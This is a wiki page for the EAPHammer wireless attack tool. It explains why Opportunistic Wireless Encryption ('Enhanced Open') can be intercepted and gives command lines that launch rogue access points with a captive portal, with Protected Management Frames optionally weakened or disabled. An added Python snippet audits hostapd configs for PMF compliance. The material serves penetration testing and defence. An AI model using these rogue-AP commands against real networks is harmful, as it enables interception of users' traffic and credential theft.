
XV. Attacking Opportunistic Wireless Encryption

Gabriel Ryan edited this page Feb 11, 2020 · 1 revision


Special thanks to Steve Darracott for his help researching this subject: @thedarracott

EAPHammer supports attacks against networks and clients that are configured to use Opportunistic Wireless Encryption (OWE), which is also known as "Enhanced Open". For a theoretical overview of this subject, please refer to the following blog posts:

tl;dr - OWE is used to provide encryption capabilities to public wireless networks. You can think of OWE like this - OWE is to open networks as HTTPS is to HTTP. However, unlike HTTPS, OWE does not provide any means of authenticating the identity of what you're connecting to (HTTPS uses server certs). This means that it can be compromised using Person-In-the-Middle (PITM) attacks. From an operational standpoint, this means that you can execute rogue AP attacks against OWE in the same way you would against open networks.

To create a rogue access point that uses OWE, just pass the --auth owe flag as shown in the following example:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal

Note that by default, eaphammer will conform to RFC 8110 by requiring stations to use Protected Management Frames (PMF) when --auth owe is used. You are free to tell eaphammer to violate RFC 8110 by making PMF enabled but not required:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf enable

Should you wish to commit an even more egregious RFC violation, you can disable PMF completely as well:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf disable

OWE Transition Mode

EAPHammer also supports attacks against OWE Transition Mode. To create a rogue AP that uses OWE Transition Mode, use the --auth owe-transition flag as shown in the following example:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal

By default, eaphammer will conform to RFC 8110 by enabling but not requiring PMF when --auth owe-transition is used. You are free to tell eaphammer to violate RFC 8110 by making PMF required:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf require

Alternatively, you can disable PMF completely:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf disable
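The PMF rules described above for OWE and for OWE Transition Mode, turned into a small audit of a hostapd BSS configuration, so that a defender can check whether an "Enhanced Open" deployment actually requires PMF. This is an added example, not EAPHammer's or the wiki's own code; it assumes hostapd's wpa_key_mgmt, ieee80211w and owe_transition_* configuration keys, and the sample configs are constructed.

```python
# Added example, not EAPHammer's own code and not from the wiki page.
# Audits a hostapd BSS config against the PMF policy this page describes
# for RFC 8110: a plain OWE BSS requires PMF (hostapd ieee80211w=2); an
# OWE transition-mode BSS enables PMF without requiring it (ieee80211w=1).
# Sample configs below are constructed for the example.

def parse_hostapd(text):
    """Return key -> value for a single-BSS hostapd config; last key wins."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf

def audit_owe_pmf(conf):
    """Return a list of findings for an OWE BSS; empty means it matches policy."""
    akms = conf.get("wpa_key_mgmt", "").split()
    if "OWE" not in akms:
        return []                       # not an OWE BSS, nothing to check
    pmf = conf.get("ieee80211w", "0")   # hostapd default when unset is 0 (off)
    transition = any(k.startswith("owe_transition_") for k in conf)
    expected = "1" if transition else "2"
    if pmf == "0":
        return ["PMF disabled (ieee80211w=0) on an OWE BSS: RFC 8110 violation"]
    if pmf != expected:
        mode = "transition-mode" if transition else "plain"
        return ["%s OWE BSS sets ieee80211w=%s, baseline on this page is %s"
                % (mode, pmf, expected)]
    return []

# Constructed samples: a compliant OWE BSS and one with PMF switched off.
GOOD_OWE = """
ssid=EnhancedOpenCafe
wpa=2
wpa_key_mgmt=OWE
rsn_pairwise=CCMP
ieee80211w=2
"""
NO_PMF_OWE = """
ssid=EnhancedOpenCafe
wpa=2
wpa_key_mgmt=OWE
rsn_pairwise=CCMP
ieee80211w=0
"""

if __name__ == "__main__":
    for name, text in (("good", GOOD_OWE), ("no_pmf", NO_PMF_OWE)):
        print(name, audit_owe_pmf(parse_hostapd(text)) or ["ok"])
```

A BSS that advertises OWE without requiring PMF, or an OWE transition-mode BSS whose open twin you did not deploy, is worth a second look during a wireless survey.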